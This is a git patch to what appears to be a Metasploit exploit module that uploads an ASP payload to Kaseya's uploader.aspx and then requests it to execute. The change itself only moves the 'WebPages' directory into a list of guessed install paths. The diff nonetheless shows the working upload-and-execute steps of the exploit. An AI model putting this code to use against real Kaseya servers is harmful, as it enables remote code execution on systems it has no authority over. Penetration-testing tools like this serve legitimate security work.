From a88a6c55804d00b3cfea9364bf26f92b3bff6bd4 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 Oct 2015 13:22:56 -0500 Subject: [PATCH] Add WebPges to the paths --- .../exploits/windows/http/kaseya_uploader.rb | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/modules/exploits/windows/http/kaseya_uploader.rb b/modules/exploits/windows/http/kaseya_uploader.rb index a3c0b7f4cc..8f03ed2b1a 100644 --- a/modules/exploits/windows/http/kaseya_uploader.rb +++ b/modules/exploits/windows/http/kaseya_uploader.rb @@ -60,13 +60,13 @@ class Metasploit3 < Msf::Exploit::Remote def upload_file(payload, path, filename, session_id) - print_status("#{peer} - Uploading payload to #{path + 'WebPages\\'}...") + print_status("#{peer} - Uploading payload to #{path}...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri('ConfigTab', 'uploader.aspx'), 'vars_get' => { - 'PathData' => path + 'WebPages' + '\\', + 'PathData' => path, 'qqfile' => filename }, 'data' => payload, @@ -100,20 +100,20 @@ class Metasploit3 < Msf::Exploit::Remote paths = [ # We have to guess the path, so just try the most common directories - 'C:\\Kaseya\\', - 'C:\\Program Files\\Kaseya\\', - 'C:\\Program Files (x86)\\Kaseya\\', - 'D:\\Kaseya\\', - 'D:\\Program Files\\Kaseya\\', - 'D:\\Program Files (x86)\\Kaseya\\', - 'E:\\Kaseya\\', - 'E:\\Program Files\\Kaseya\\', - 'E:\\Program Files (x86)\\Kaseya\\', + 'C:\\Kaseya\\WebPages\\', + 'C:\\Program Files\\Kaseya\\WebPages\\', + 'C:\\Program Files (x86)\\Kaseya\\WebPages\\', + 'D:\\Kaseya\\WebPages\\', + 'D:\\Program Files\\Kaseya\\WebPages\\', + 'D:\\Program Files (x86)\\Kaseya\\WebPages\\', + 'E:\\Kaseya\\WebPages\\', + 'E:\\Program Files\\Kaseya\\WebPages\\', + 'E:\\Program Files (x86)\\Kaseya\\WebPages\\', ] paths.each do |path| if upload_file(payload, path, asp_name, session_id) - register_files_for_cleanup(path + "WebPages\\" + asp_name) + register_files_for_cleanup(path + asp_name) print_status("#{peer} - Executing payload #{asp_name}") send_request_cgi({